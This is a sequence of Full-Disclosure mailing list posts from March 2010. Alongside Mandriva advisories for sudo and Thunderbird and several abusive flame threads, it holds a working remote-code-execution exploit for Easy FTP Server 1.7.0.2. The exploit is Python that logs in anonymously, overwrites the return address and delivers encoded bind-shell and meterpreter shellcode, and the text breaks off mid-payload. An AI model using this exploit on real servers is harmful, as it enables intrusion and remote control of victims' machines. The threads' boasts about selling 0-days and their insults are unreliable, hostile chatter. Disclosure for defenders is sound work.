 Date: March 1, 2010
 Affected: 2009.0, Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerabilitiy has been found and corrected in sudo:
 
 sudo 1.6.x before 1.6.9p21, when the runas_default option is used,
 does not properly set group memberships, which allows local users to
 gain privileges via a sudo command (CVE-2010-0427).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0427
 ___

 Updated Packages:

 Mandriva Linux 2009.0:
 7cc6a5245edf4bf1a8e7563e9903a4d9  
2009.0/i586/sudo-1.6.9p17-1.3mdv2009.0.i586.rpm 
 fcc025ccfc6cceeb670ec4e0d4c4cf8f  
2009.0/SRPMS/sudo-1.6.9p17-1.3mdv2009.0.src.rpm

 Mandriva Linux 2009.0/X86_64:
 14fe9eeebf2371880c5cd0a740f5dfb7  
2009.0/x86_64/sudo-1.6.9p17-1.3mdv2009.0.x86_64.rpm 
 fcc025ccfc6cceeb670ec4e0d4c4cf8f  
2009.0/SRPMS/sudo-1.6.9p17-1.3mdv2009.0.src.rpm

 Mandriva Enterprise Server 5:
 36382465ca0cbf2cf7269ba73f2f2605  mes5/i586/sudo-1.6.9p17-1.3mdvmes5.i586.rpm 
 35bb4f5204b26bb01c81301586d52dc8  mes5/SRPMS/sudo-1.6.9p17-1.3mdv2009.0.src.rpm

 Mandriva Enterprise Server 5/X86_64:
 30d89b7a593abe95704f0a7731e76343  
mes5/x86_64/sudo-1.6.9p17-1.3mdvmes5.x86_64.rpm 
 35bb4f5204b26bb01c81301586d52dc8  mes5/SRPMS/sudo-1.6.9p17-1.3mdv2009.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iD8DBQFLjAvUmqjQ0CJFipgRAmJUAKDsRTzXrwRJC0vZKm8A4Dy41hKt+wCdGgTK
qZ41Y8PReCo/zGd3phpKLTI=
=aFcP
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Person impersonating

[Stuart Carter]

... who the fuck cares?


Go away.



andrew.wallace wrote:
> If you haven't noticed yet guys its not me.
> 
> Why keep some youngster like that going by letting the list think its me?
> 
> Andrew

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Easy FTP Server 1.7.0.2 Remote BoF

[my.hndl]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I expanded on Jon Butler's exploit and was able to inject a Meterpreter
payload into the remote process despite the buffer's small size (268
bytes).  This was done by overwriting the ret value with part of the
Meterpreter payload.

- - Explanation of Process:
http://paulmakowski.wordpress.com/2010/02/28/increasing-payload-size-w-return-address-overwrite/
- - Vulnerable Program:
http://easyftpsvr.googlecode.com/files/easyftpsvr-1.7.0.2.zip
- - Exploit Download:
https://tegosecurity.com/etc/return_overwrite/RCE_easy_ftp_server_1.7.0.2.zip

#

#!/usr/bin/env python
# RCE for Easy FTP Server 1.7.0.2 w/ RET overwrite
# app @ http://code.google.com/p/easyftpsvr/
# Copyright 2010 Paul Makowski, GPLv2
# explanation of technique: http://wp.me/pBV1X-3Q
# based on: http://seclists.org/bugtraq/2010/Feb/202
# version 0.1

import socket
from sys import exit
from optparse import OptionParser

parser = OptionParser()
parser.add_option("-t", "--target", dest="target", metavar="TARGET",
type="string", help="target IP address")
parser.add_option("-p", "--port", dest="port", metavar="PORT",
type="string", help="target port")
(options, args) = parser.parse_args()

if not options.target: parser.error("Target unspecified.")
if not options.port: options.port = 21

# -- #

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
   connect = s.connect((options.target, int(options.port)))
   print "[+] connected"

except:
   print "[-] connection failed"
   exit(1)

# get to vulnerable code (post auth, defaults allow anon login)
s.recv(1024)
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS anonymous\r\n")
s.recv(1024)


### fixRet ###
# ret is located @ 0x009afe64 & needs to be replaced with part of our
payload (or NOPs)
fixRet = (
   "\x31\xc0" +# xor%eax,%eax
   "\x31\xdb" +# xor%ebx,%ebx
   "\x31\xc9" +# xor%ecx,%ecx
   "\xb8\xce\x54\x30\xaa" +# mov$0xaa3054ce,%eax
   "\xbb\xaa\xaa\xaa\xaa" +# mov$0x,%ebx
   "\x31\xd8" +# xor%ebx,%eax (now %eax should
hold 0x009AFE64)
   #"\xb9\x90\x90\x90\x90" +   # mov$0x90909090,%ecx (use this
if your payload <= 233 bytes)
   #"\xb9\x1a\x29\xeb\x0e" +   # mov$0xeeb291a,%ecx (4 bytes
of bind_tcp payload to overwrite RET with)
   "\xb9\x5f\xe4\xe0\xae" +# mov$0xaee0e45f,%ecx (4 bytes
of meterpreter_bind_tcp payload to overwrite RET with)
   "\x89\x08" )# mov%ecx,(%eax)


### payloads ###
# $ ./msfpayload windows/shell_bind_tcp R | ./msfencode -b
"\x00\x0a\x0d\xff"
# [*] x86/shikata_ga_nai succeeded with size 369 (iteration=1)
bind_tcp = (

# this will go before the RET location
"\x33\xc9\xb1\x56\xd9\xf6\xd9\x74\x24\xf4\xbb\xcb\xf4\x35" +
"\xcb\x58\x31\x58\x15\x83\xe8\xfc\x03\x58\x11\x29\x01\xc9" +
"\x23\x24\xea\x32\xb4\x56\x62\xd7\x85\x44\x10\x93\xb4\x58" +
"\x52\xf1\x34\x13\x36\xe2\xcf\x51\x9f\x05\x67\xdf\xf9\x28" +
"\x78\xee\xc5\xe7\xba\x71\xba\xf5\xee\x51\x83\x35\xe3\x90" +
"\xc4\x28\x0c\xc0\x9d\x27\xbf\xf4\xaa\x7a\x7c\xf5\x7c\xf1" +
"\x3c\x8d\xf9\xc6\xc9\x27\x03\x17\x61\x3c\x4b\x8f\x09\x1a" +
"\x6c\xae\xde\x79\x50\xf9\x6b\x49\x22\xf8\xbd\x80\xcb\xca" +
"\x81\x4e\xf2\xe2\x0f\x8f\x32\xc4\xef\xfa\x48\x36\x8d\xfc" +
"\x8a\x44\x49\x89\x0e\xee" +

# these 4 bytes will be written over RET by fixRet
"\x1a\x29\xeb\x0e" +

# this will go after the RET location
"\xce\xaf\x78\x1c" +
"\xbb\xa4\x27\x01\x3a\x69\x5c\x3d\xb7\x8c\xb3\xb7\x83\xaa" +
"\x17\x93\x50\xd3\x0e\x79\x36\xec\x51\x25\xe7\x48\x19\xc4" +
"\xfc\xea\x40\x81\x31\xc0\x7a\x51\x5e\x53\x08\x63\xc1\xcf" +
"\x86\xcf\x8a\xc9\x51\x2f\xa1\xad\xce\xce\x4a\xcd\xc7\x14" +
"\x1e\x9d\x7f\xbc\x1f\x76\x80\x41\xca\xd8\xd0\xed\xa5\x98" +
"\x80\x4d\x16\x70\xcb\x41\x49\x60\xf4\x8b\xfc\xa7\x3a\xef" +
"\xac\x4f\x3f\x0f\x42\xd3\xb6\xe9\x0e\xfb\x9e\xa2\xa6\x39" +
"\xc5\x7a\x50\x42\x2f\xd7\xc9\xd4\x67\x31\xcd\xdb\x77\x17" +
"\x7d\x70\xdf\xf0\xf6\x9a\xe4\xe1\x08\xb7\x4c\x6b\x31\x5f" +
"\x06\x05\xf3\xfe\x17\x0c\x63\x63\x85\xcb\x74\xea\xb6\x43" +
"\x22\xbb\x09\x9a\xa6\x51\x33\x34\xd5\xa8\xa5\x7f\x5d\x76" +
"\x16\x81\x5f\xfb\x22\xa5\x4f\xc5\xab\xe1\x3b\x99\xfd\xbf" +
"\x95\x5f\x54\x0e\x4c\x09\x0b\xd8\x18\xcc\x67\xdb\x5e\xd1" +
"\xad\xad\xbf\x63\x18\xe8\xc0\x4b\xcc\xfc\xb9\xb6\x6c\x02" +
"\x10\x73\x9c\x49\x39\xd5\x35\x14\xab\x64\x58\xa7\x01\xaa" +
"\x65\x24\xa0\x52\x92\x34\xc1\x57\xde\xf2\x39\x25\x4f\x97" +
"\x3d\x9a\x70\xb2\x34" )


# $ ./msfpayload windows/meterpreter/bind_tcp R | ./msfencode -b
"\x00\x0a\x0d\xff\x2f\x5c"
# [*] x86/shikata_ga_nai succeeded with size 326 (iteration=1)
meterpreter_bind_tcp = (

# this will go before the RET location
"\xbf\xdd\x9f\x97\x4f\x29\xc9\xb1\x4b\xda\xc2\xd9\x74\x24" +
"\xf4\x5d\x31\x7d\x11\x03\x7d\x11\x83\xed\xfc\xe2\x28\x63" +
"\x7f\xc6\xd2\x9c\x80\xb9\x5b\x79\xb1\xeb\x3f\x09\xe0\x3b" +
"\x34\x5f\x09\xb7\x18\x74\x9a\xb5\xb4\x7b\x2b\x73\xe2\xb2

Re: [Full-disclosure] I am furious.

[Jeff Williams]

>
>  "I spend my career working against hackers, proposing new laws and
>  lobbying the government to make life difficult for hackers."
>

The only career you've done so far is as a drug addict, and you're doing
that pretty well.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I am furious.

[Christian Sciberras]

"why dont you use your big words to explain how is it fair that im
banned here"
Banned? How then would it be that you're still here?

"im a mi5 honeytrap and the government is going to come to me and
ask for my help. i record videos of these guys jerking off and
forward them to mark seiden."
Oh come on, we all know you keep some for yourself...



On Mon, Mar 1, 2010 at 9:53 PM, intel unit  wrote:

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> why dont you use your big words to explain how is it fair that im
> banned here
>
> i am trying to save lives. i pose as a minor in yahoo chatrooms and
> let old fat blokes message me.
>
> i expose them.
>
> im a mi5 honeytrap and the government is going to come to me and
> ask for my help. i record videos of these guys jerking off and
> forward them to mark seiden.
>
> it's counter intelligent.
>
> what are your accomplishments valdis?
>
> On Mon, 01 Mar 2010 20:37:02 + valdis.kletni...@vt.edu wrote:
> >On Mon, 01 Mar 2010 18:48:22 GMT, intel unit said:
> >
> >> We are security experts nothing to do with hackers and 0-day.
> >
> >> I don't have just 1 0day. I have 26 0days and can hack anything
> >if
> >> the price is right.
> >
> >Cognitive dissonance FTW. ;)
> -BEGIN PGP SIGNATURE-
> Charset: UTF8
> Note: This signature can be verified at https://www.hushtools.com/verify
> Version: Hush 3.0
>
> wpwEAQMCAAYFAkuMKVwACgkQwGoky+I7Eouj2QP/aQpcA6lGntK6ilPuv6bU0L/XpBJf
> Pq7CG79N7JAHVSTwwgEoeeUkBrXHjg9jNpIxSMeVnMfKfL5tf42i9rIkwY8a7kT6faBW
> 4HeRVrEYWPKHOiuquZKHTLtqzKf9YR/kIFBLqbtXo2500U0Q5Rr37W8wvUdA4GCL2Qv2
> zswt1uo=
> =dn1B
> -END PGP SIGNATURE-
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I am furious.

[intel unit]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

why dont you use your big words to explain how is it fair that im
banned here

i am trying to save lives. i pose as a minor in yahoo chatrooms and
let old fat blokes message me.

i expose them.

im a mi5 honeytrap and the government is going to come to me and
ask for my help. i record videos of these guys jerking off and
forward them to mark seiden.

it's counter intelligent.

what are your accomplishments valdis?

On Mon, 01 Mar 2010 20:37:02 + valdis.kletni...@vt.edu wrote:
>On Mon, 01 Mar 2010 18:48:22 GMT, intel unit said:
>
>> We are security experts nothing to do with hackers and 0-day.
>
>> I don't have just 1 0day. I have 26 0days and can hack anything
>if
>> the price is right.
>
>Cognitive dissonance FTW. ;)
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkuMKVwACgkQwGoky+I7Eouj2QP/aQpcA6lGntK6ilPuv6bU0L/XpBJf
Pq7CG79N7JAHVSTwwgEoeeUkBrXHjg9jNpIxSMeVnMfKfL5tf42i9rIkwY8a7kT6faBW
4HeRVrEYWPKHOiuquZKHTLtqzKf9YR/kIFBLqbtXo2500U0Q5Rr37W8wvUdA4GCL2Qv2
zswt1uo=
=dn1B
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I am furious.

[Stuart Carter]

intel unit wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> You decided to use and abuse my web log postings for your own self
> satisfaction.
> 


... dude, it'll be a cold day in hell before I use anything from *you* 
for self satisfaction O.O


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I am furious.

[the hacker]

On Mon, 01 Mar 2010 18:48:22 GMT, intel unit said:



>  We are security experts nothing to do with hackers and 0-day.
   
>  I don't have just 1 0day. I have 26 0days and can hack anything if

>  the price is right.
   


01.03.10 21:37, valdis.kletni...@vt.edu:


Cognitive dissonance FTW.;)


Or more likely shizoid tendencies leading to multiple identity disturbances

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I am furious.

[intel unit]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I'm not interested in this kind of behaviour from young people.

You had the opportunity to read an experts view of national
security and intelligence and you blew it.

You decided to use and abuse my web log postings for your own self
satisfaction.

You made cheap remarks about 0-day and Yahoo Messenger and hackers,
none of which I have anything to do with.

I spend my career working against hackers, proposing new laws and
lobbying the government to make life difficult for hackers.

You don't seem to care what damage misrepsentation does to someone.
You lost me my job opportunity at Yahoo and MI5.

Mark Seiden, any chance you will hire me still tho?

On Mon, 01 Mar 2010 18:57:26 + netinfinity
 wrote:
>*I have 26 0days and can hack anything if
>the price is right. And I sell them to the bad guys, for the lulz.
>I think being disloyal and a hypocrite is hilarious.
>
>I am a consummate civil servant, if I do say so myself.
>*
>
>You are a funny troll. I like your posts :)
>
>--
>http://netinfinity-sec.blogspot.com
>
>http://www.ubuntu-pe.tk
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkuMKGsACgkQwGoky+I7Eot08gP+PpcPWyM2rVODku99izyiieN0lpor
UJIqltAunhEWt+2eFjf2H+UYYywnVqRydRMPZGa49zYLMjl4+4EGOchKzrC5H4tFy59h
/gJLdff05iEddcq5zFA132FSHwLuaabFBqft0mC1lQsihGdHetRwqsDGQYn8Tk/JyXb7
7rsCWfg=
=Vsyj
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I am furious.

[Valdis . Kletnieks]

On Mon, 01 Mar 2010 18:48:22 GMT, intel unit said:

> We are security experts nothing to do with hackers and 0-day.

> I don't have just 1 0day. I have 26 0days and can hack anything if
> the price is right.

Cognitive dissonance FTW. ;)


pgpYOFX7gs9ut.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Going "underground", living out of backpack, etc?

[NOC]

On 3/1/10 8:30 AM, "valdis.kletni...@vt.edu" 
wrote:
> ...  Giardia out in the woods is a horrid
> way to die a slow death.

Giardia, isn't that the new shopping mall restaurant chain?


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I am furious.

[Stuart Carter]

I really couldn't give a flying rat's posterior what you think. You are 
an utter twerp who only adds noise to this list.

Go away.



intel unit wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
> 
> I am stopping using this web log 

blah blah blah shut up twerp
> 
> wpwEAQMCAAYFAkuMC/YACgkQwGoky+I7EovcNgP/VmABlM8SsYANvwEROSZIfrJYd1ZI
> S83fggswtSrnNcRxzGYfh0KnXC694mlRd2Laq18w/wfNL6orCM4RnHGSyoFeSRK6dcMZ
> yC2jpd79S/1xen/Lh5UIPNFQs8U8HJveWFxGnhm77GfSl1YQEIHsPo9eNsgz9wzdIOhu
> cnfmq/Y=
> =9yO5
> -END PGP SIGNATURE-
> 


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I am furious.

[Urlan]

Hahahahahahahaha!

Urlan

2010/3/1 M.B.Jr. 

> Ai, santa!
>
>
> On Mon, Mar 1, 2010 at 3:48 PM, intel unit  wrote:
> > -BEGIN PGP SIGNED MESSAGE-
> > Hash: SHA1
> >
> > I am stopping using this web log its just being used by people not
> > interested in national security to paste my work to Full-disclosure
> > mailing list to misrepresent me and my group.
> >
> > They tried to say I was a hacker with 0-day, I am furious.
> >
> > We are security experts nothing to do with hackers and 0-day.
> >
> > I spend my life against hackers and 0-day, I suggest new laws
> > against hackers, and lobby the government to introduce new laws to
> > gain more intelligence about them.
> >
> > I am a strong policy maker within corporations against hackers and
> > 0-day.
> >
> > This misrepresentation is damaging and I am angry.
> >
> > I don't have just 1 0day. I have 26 0days and can hack anything if
> > the price is right. And I sell them to the bad guys, for the lulz.
> > I think being disloyal and a hypocrite is hilarious.
> >
> > I am a consummate civil servant, if I do say so myself.
> >
> > This web log is now closed, I got sum inboxin to do.
> > -BEGIN PGP SIGNATURE-
> > Charset: UTF8
> > Note: This signature can be verified at https://www.hushtools.com/verify
> > Version: Hush 3.0
> >
> > wpwEAQMCAAYFAkuMC/YACgkQwGoky+I7EovcNgP/VmABlM8SsYANvwEROSZIfrJYd1ZI
> > S83fggswtSrnNcRxzGYfh0KnXC694mlRd2Laq18w/wfNL6orCM4RnHGSyoFeSRK6dcMZ
> > yC2jpd79S/1xen/Lh5UIPNFQs8U8HJveWFxGnhm77GfSl1YQEIHsPo9eNsgz9wzdIOhu
> > cnfmq/Y=
> > =9yO5
> > -END PGP SIGNATURE-
> >
> > ___
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
>
>
> --
> Marcio Barbado, Jr.
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
_
Urlan Salgado de Barros
MSc. Student in Applied Informatics
Member of NR2 Group
Federal University of Paraná - Curitiba - Brazil
URL: 
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I am furious.

[M.B.Jr.]

Ai, santa!


On Mon, Mar 1, 2010 at 3:48 PM, intel unit  wrote:
> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA1
>
> I am stopping using this web log its just being used by people not
> interested in national security to paste my work to Full-disclosure
> mailing list to misrepresent me and my group.
>
> They tried to say I was a hacker with 0-day, I am furious.
>
> We are security experts nothing to do with hackers and 0-day.
>
> I spend my life against hackers and 0-day, I suggest new laws
> against hackers, and lobby the government to introduce new laws to
> gain more intelligence about them.
>
> I am a strong policy maker within corporations against hackers and
> 0-day.
>
> This misrepresentation is damaging and I am angry.
>
> I don't have just 1 0day. I have 26 0days and can hack anything if
> the price is right. And I sell them to the bad guys, for the lulz.
> I think being disloyal and a hypocrite is hilarious.
>
> I am a consummate civil servant, if I do say so myself.
>
> This web log is now closed, I got sum inboxin to do.
> -BEGIN PGP SIGNATURE-
> Charset: UTF8
> Note: This signature can be verified at https://www.hushtools.com/verify
> Version: Hush 3.0
>
> wpwEAQMCAAYFAkuMC/YACgkQwGoky+I7EovcNgP/VmABlM8SsYANvwEROSZIfrJYd1ZI
> S83fggswtSrnNcRxzGYfh0KnXC694mlRd2Laq18w/wfNL6orCM4RnHGSyoFeSRK6dcMZ
> yC2jpd79S/1xen/Lh5UIPNFQs8U8HJveWFxGnhm77GfSl1YQEIHsPo9eNsgz9wzdIOhu
> cnfmq/Y=
> =9yO5
> -END PGP SIGNATURE-
>
> ___
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>



-- 
Marcio Barbado, Jr.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] I am furious.

[netinfinity]

 *I have 26 0days and can hack anything if
the price is right. And I sell them to the bad guys, for the lulz.
I think being disloyal and a hypocrite is hilarious.

I am a consummate civil servant, if I do say so myself.
*

You are a funny troll. I like your posts :)

-- 
http://netinfinity-sec.blogspot.com

http://www.ubuntu-pe.tk
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] I am furious.

[intel unit]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

I am stopping using this web log its just being used by people not
interested in national security to paste my work to Full-disclosure
mailing list to misrepresent me and my group.

They tried to say I was a hacker with 0-day, I am furious.

We are security experts nothing to do with hackers and 0-day.

I spend my life against hackers and 0-day, I suggest new laws
against hackers, and lobby the government to introduce new laws to
gain more intelligence about them.

I am a strong policy maker within corporations against hackers and
0-day.

This misrepresentation is damaging and I am angry.

I don't have just 1 0day. I have 26 0days and can hack anything if
the price is right. And I sell them to the bad guys, for the lulz.
I think being disloyal and a hypocrite is hilarious.

I am a consummate civil servant, if I do say so myself.

This web log is now closed, I got sum inboxin to do.
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

wpwEAQMCAAYFAkuMC/YACgkQwGoky+I7EovcNgP/VmABlM8SsYANvwEROSZIfrJYd1ZI
S83fggswtSrnNcRxzGYfh0KnXC694mlRd2Laq18w/wfNL6orCM4RnHGSyoFeSRK6dcMZ
yC2jpd79S/1xen/Lh5UIPNFQs8U8HJveWFxGnhm77GfSl1YQEIHsPo9eNsgz9wzdIOhu
cnfmq/Y=
=9yO5
-END PGP SIGNATURE-

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Going "underground", living out of backpack, etc?

[Valdis . Kletnieks]

On Mon, 01 Mar 2010 04:49:57 GMT, Simon Garfinkle said:

> Have any advice for living out of a bag? Any stories? Any lessons?

Hit up one of the survivalist websites or magazines, look for info on
living off the land.  Learn bowhunting - a rifle tends to draw attention
outside the local hunting season.  Read up on how the Appalachian Trail
through-hikers handle being on a trail for 6 months.

Oh - and get a decent water filter.  Giardia out in the woods is a horrid
way to die a slow death. 


pgp6VZiGSBPo5.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] [ MDVSA-2010:051 ] mozilla-thunderbird

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2010:051
 http://www.mandriva.com/security/
 ___

 Package : mozilla-thunderbird
 Date: March 1, 2010
 Affected: 2008.0, 2009.1, 2010.0
 ___

 Problem Description:

 A vulnerabilitiy has been found and corrected in mozilla-thunderbird:
 
 Security researcher Alin Rad Pop of Secunia Research reported that
 the HTML parser incorrectly freed used memory when insufficient space
 was available to process remaining input. Under such circumstances,
 memory occupied by in-use objects was freed and could later be filled
 with attacker-controlled text. These conditions could result in the
 execution or arbitrary code if methods on the freed objects were
 subsequently called (CVE-2009-1571).
 
 Packages for 2008.0 are provided for Corporate Desktop 2008.0
 customers.
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1571
 http://www.mozilla.org/security/announce/2010/mfsa2010-03.html
 ___

 Updated Packages:

 Mandriva Linux 2008.0:
 2669429882c6f2d4f896007a4b81c0cc  
2008.0/i586/mozilla-thunderbird-2.0.0.23-1.3mdv2008.0.i586.rpm
 8ab5c1d63809c1cbc46f52de0afc053f  
2008.0/i586/mozilla-thunderbird-devel-2.0.0.23-1.3mdv2008.0.i586.rpm
 c40f64b4e053d51df02c23d777615f9c  
2008.0/i586/mozilla-thunderbird-enigmail-2.0.0.23-1.3mdv2008.0.i586.rpm
 f43d572170fec137873c42c698abba4d  
2008.0/i586/nsinstall-2.0.0.23-1.3mdv2008.0.i586.rpm 
 4abdb45fe3d2091d6aeb84094d8ac1a2  
2008.0/SRPMS/mozilla-thunderbird-2.0.0.23-1.3mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 6172c6e7d8852d8ec73b29ae814417fe  
2008.0/x86_64/mozilla-thunderbird-2.0.0.23-1.3mdv2008.0.x86_64.rpm
 e691518e1dd9120b3ec55cc80af4e928  
2008.0/x86_64/mozilla-thunderbird-devel-2.0.0.23-1.3mdv2008.0.x86_64.rpm
 a30f96d07eea85b6678d3469a5b88f91  
2008.0/x86_64/mozilla-thunderbird-enigmail-2.0.0.23-1.3mdv2008.0.x86_64.rpm
 81b4ddb1e4eecc848c4cbc37bd3f4b87  
2008.0/x86_64/nsinstall-2.0.0.23-1.3mdv2008.0.x86_64.rpm 
 4abdb45fe3d2091d6aeb84094d8ac1a2  
2008.0/SRPMS/mozilla-thunderbird-2.0.0.23-1.3mdv2008.0.src.rpm

 Mandriva Linux 2009.1:
 d68983379c1ca52f6c0a4175e79cd640  
2009.1/i586/mozilla-thunderbird-2.0.0.23-0.4mdv2009.1.i586.rpm
 9e89756f135bdaa72bf6b511ee667ead  
2009.1/i586/mozilla-thunderbird-devel-2.0.0.23-0.4mdv2009.1.i586.rpm
 bbf5f3bda970bb86ce55b66e12e64907  
2009.1/i586/mozilla-thunderbird-enigmail-2.0.0.23-0.4mdv2009.1.i586.rpm
 c1a46fbffdd4d2fc5c101fcc55b902b6  
2009.1/i586/nsinstall-2.0.0.23-0.4mdv2009.1.i586.rpm 
 72d65ce1a53e8844e8c71f621fdadc18  
2009.1/SRPMS/mozilla-thunderbird-2.0.0.23-0.4mdv2009.1.src.rpm

 Mandriva Linux 2009.1/X86_64:
 802e7555022b4baf6f28269f04682bce  
2009.1/x86_64/mozilla-thunderbird-2.0.0.23-0.4mdv2009.1.x86_64.rpm
 122a5efa00ccc3dafbe270f14a1962cf  
2009.1/x86_64/mozilla-thunderbird-devel-2.0.0.23-0.4mdv2009.1.x86_64.rpm
 49fb3867b121998c86c120ae42d4b9fc  
2009.1/x86_64/mozilla-thunderbird-enigmail-2.0.0.23-0.4mdv2009.1.x86_64.rpm
 6f9df106772918d05836526a11f40e16  
2009.1/x86_64/nsinstall-2.0.0.23-0.4mdv2009.1.x86_64.rpm 
 72d65ce1a53e8844e8c71f621fdadc18  
2009.1/SRPMS/mozilla-thunderbird-2.0.0.23-0.4mdv2009.1.src.rpm

 Mandriva Linux 2010.0:
 9ef8f1537843b2c490ca143f3483ff90  
2010.0/i586/mozilla-thunderbird-2.0.0.23-3.3mdv2010.0.i586.rpm
 c79d2b30bacc364d332369b5af9bdd63  
2010.0/i586/mozilla-thunderbird-devel-2.0.0.23-3.3mdv2010.0.i586.rpm
 ba2eb612b17795a6c0bbbde7494a14d3  
2010.0/i586/mozilla-thunderbird-enigmail-2.0.0.23-3.3mdv2010.0.i586.rpm
 6df1a02ac8002218f5b1e47a2fff9925  
2010.0/i586/nsinstall-2.0.0.23-3.3mdv2010.0.i586.rpm 
 62a8bf250e22e2bd78f0cb2baa0199d1  
2010.0/SRPMS/mozilla-thunderbird-2.0.0.23-3.3mdv2010.0.src.rpm

 Mandriva Linux 2010.0/X86_64:
 9237ccb3f2930777857bf4e2e9316b19  
2010.0/x86_64/mozilla-thunderbird-2.0.0.23-3.3mdv2010.0.x86_64.rpm
 e5fba2b9e3b714887cfef59028c58da0  
2010.0/x86_64/mozilla-thunderbird-devel-2.0.0.23-3.3mdv2010.0.x86_64.rpm
 f1e53699bf38123350a4cde8ad89a506  
2010.0/x86_64/mozilla-thunderbird-enigmail-2.0.0.23-3.3mdv2010.0.x86_64.rpm
 099f31525f8a73242481bc121a05f811  
2010.0/x86_64/nsinstall-2.0.0.23-3.3mdv2010.0.x86_64.rpm 
 62a8bf250e22e2bd78f0cb2baa0199d1  
2010.0/SRPMS/mozilla-thunderbird-2.0.0.23-3.3mdv2010.0.src.rpm
 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of

Re: [Full-disclosure] full disclosure is an intelligence blackhole

[Valdis . Kletnieks]

On Mon, 01 Mar 2010 08:06:23 GMT, intel unit said:

